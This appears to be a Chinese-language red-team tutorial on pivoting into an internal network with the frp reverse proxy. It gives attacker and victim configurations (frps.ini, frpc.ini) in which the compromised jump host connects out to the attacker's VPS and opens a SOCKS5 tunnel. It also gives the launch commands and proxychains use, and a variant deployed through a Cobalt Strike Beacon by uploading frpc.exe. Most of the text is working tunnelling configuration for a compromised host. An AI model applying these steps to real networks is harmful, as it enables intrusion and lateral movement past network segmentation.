FRP 是一個專注於內網穿透的高性能的反向代理應用,支持 TCP、UDP、HTTP、HTTPS 等多種協議,且支持 P2P 通信。可以將內網服務以安全、便捷的方式通過具有公網 IP 節點的中轉暴露到公網。
frp 專案地址:https://github.com/fatedier/frp/blob/dev/README_zh.md
假如當前的網絡拓撲如下,172.16.1.2 無法直接訪問 10.1.1.2,需要通過 frp 代理訪問。
frp vps 代理#
172.16.1.2 - <172.16.1.4,10.1.1.3 > 10.1.1.2
攻擊者(172.16.1.2):
配置 frps.in 文件
配置文件如下:
frps.ini
[common]
bind_port = 7000
bind_addr = 0.0.0.0
受害者(跳板機:172.16.1.4)如下配置:
配置 frpc.ini,內容如下:
frpc.ini
[common]
server_addr = vpsip
server_port = 7000
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
設置完成後,先攻擊者伺服器開啟監聽
./frps -c frps.ini
受害者端執行
frpc.exe -c frpc.ini
瀏覽器設置代理訪問
proxychains 配置代理遠程登錄
CS 配置 frp#
假如拓撲如下,和之前的操作其實一致。
172.16.1.3 - <172.16.1.4,10.1.1.4 > 10.1.1.3
用 CS 的 Beacon 運行 frpc 時,配置文件和程式都用絕對路徑。利用文件上傳 frpc.exe 和 frpc.ini 文件來進行代理。
配置文件如下
frps.ini
[common]
bind_port = 7000
frpc.ini
[common]
server_addr = 172.16.1.3
server_port = 7000
[http_proxy]
type = tcp
remote_port = 1080
plugin = socks5
代理成功。